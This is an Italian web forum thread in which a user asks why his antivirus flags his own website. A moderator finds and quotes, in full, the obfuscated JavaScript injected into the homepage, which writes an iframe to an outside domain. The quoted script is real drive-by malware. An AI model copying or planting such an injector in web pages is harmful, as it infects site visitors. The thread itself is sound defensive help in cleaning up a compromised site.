Pagina 1 di 2 1 2 ultimoultimo
Visualizzazione dei risultati da 1 a 10 su 13

Virus nel proprio sito: aiuto!

Buonasera a tutti; sono nuovo del forum, mi sono appena iscritto...
    Ho un problema e spero davvero che qualcuno possa e riesca ad aiutarmi!
    Ho come antivirus Kaspersky 2012 e quando devo entrare nel mio sito internet (xxxxxxxx) mi dice che c'è un virus, per l'esattezza un trojan, e mi nega l'accesso.
    Ho provato a fare la scansione del database, ma non c'erano virus e l'ho caricato tramite filezilla, ma niente: l'antivirus mi blocca ancora!
    Spero che qualcuno riesca a darmi una mano!

Ringrazio in anticipo.
    Buona serata,
    Gianni

Utente di HTML.it L'avatar di menatwork
    ciao Gianni_80

iniziamo con un controllo di routine

scarica hijackthis e mettilo nella directory C dove avrai preparato una cartella con il suo nome.
    Lanci l'eseguibile e clicchi su " do a system scan and save a log" alla fine salvi questo file con estensione *.TXT e lo alleghi ad un post sul forum.
    i log delle scansioni caricali = > QUI

oppure = > QUI

Grazie per l'aiuto menatwork!
    Io non sono praticissimo, però ho provato a fare come mi dici tu e spero che funzioni...
    Ho provato ad allegarti il file, ma il forum non accetta come formato TXT: come posso fare?
    Volevo chiderti, poi, se questo programma che mi hai suggerito non vada a cozzare con l'antivirus che ho.

Grazie ancora

hijackthis e' un programma di lettura e non interferisce con l'antivirus

prova a caricarlo qui -> http://www.wikifortio.com/

oppure = > QUI

L'ho caricato, o almeno credo!
    Lo vedi?

Gianni_80 dopo averlo caricato devi copiare il link e incollarlo nel forim

oppure = > QUI

Scusami!!

hijackthis.TXT

Moderatore di Sicurezza informatica e virus L'avatar di Habanero
    Nel tuo sito C'E' un virus... è quello che devi eliminare... il problema non è nel tuo computer (anche se forse qualche toolbar da eliminare sul tuo pc comunque c'è, ma non è responsabile del problema).

Nella home, riga 144... c'è un javascript criptato che inserisce nel tuo sito un iframe che punta a http://abc-g.com

Questo è lo script che devi eliminare:

codice:
    <script>var a='';var b='e%/mt2t2o2CEirt-2%h2r%%a30hb232D0e2ffcpg02e2a33m%2/%h2%%r0/ mDAod%h2b233Cstc%D0%fr2rr%%.w2i5mDEea33ci6g%e%%%%22a2%%32d%i';var c='9261378504';for(var i=0;i<12;i++) for(var j=0;j<10;j++) a+=b.charAt((parseInt(c.charAt(j))*12)+i);document.writeln(unescape(a));</script><script>var a='';var b='e%/mt2t2o2CEirt-2%h2r%%a30hb232D0e2ffcpg02e2a33m%2/%h2%%r0/ mDAod%h2b233Cstc%D0%fr2rr%%.w2i5mDEea33ci6g%e%%%%22a2%%32d%i';var c='9261378504';for(var i=0;i<12;i++) for(var j=0;j<10;j++) a+=b.charAt((parseInt(c.charAt(j))*12)+i);document.writeln(unescape(a));</script>
    Verifica anche le altre pagine e soprattutto indaga sul come l'iniezione dello script sia stata possibile.
    Leggi il REGOLAMENTO!

E' molto complicato, un mucchio di input e output, una quantità di informazioni, un mucchio di elementi da considerare, ho una quantità di elementi da tener presente...
    Drugo

Pensi che possano essere i banner pubblicitari ad aver creato il problema?

Grazie, davvero!

Moderatore di Sicurezza informatica e virus L'avatar di Habanero
    In genere è possibile, ma in questo caso sembra che sia proprio la pagina ad essere stata modificata... Dubito sia stato un banner. Confronta il codice prelevato via FTP con quello originale....
    Leggi il REGOLAMENTO!

E' molto complicato, un mucchio di input e output, una quantità di informazioni, un mucchio di elementi da considerare, ho una quantità di elementi da tener presente...
    Drugo

Permessi di invio